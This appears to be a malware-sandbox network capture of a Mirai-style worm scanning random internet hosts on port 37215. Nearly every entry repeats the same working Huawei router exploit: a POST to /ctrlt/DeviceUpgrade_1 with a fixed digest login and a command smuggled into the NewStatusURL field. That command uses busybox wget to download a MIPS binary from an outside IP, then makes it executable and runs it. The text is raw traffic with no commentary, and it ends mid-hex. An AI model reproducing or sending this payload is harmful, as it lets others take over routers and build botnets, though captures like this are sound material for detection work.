                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2118192.168.2.1555558197.11.239.3037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.180571079 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2119192.168.2.1540028157.4.177.21237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.180609941 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2120192.168.2.1547222157.44.110.6337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.180620909 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2121192.168.2.156049244.233.26.15637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.180651903 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2122192.168.2.154741014.14.74.18437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.180675983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2123192.168.2.1548580197.30.196.337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.180696011 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:23.672976017 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:24.252876043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2124192.168.2.155491879.216.139.16137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.180732012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2125192.168.2.155295841.215.146.1737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.180773973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 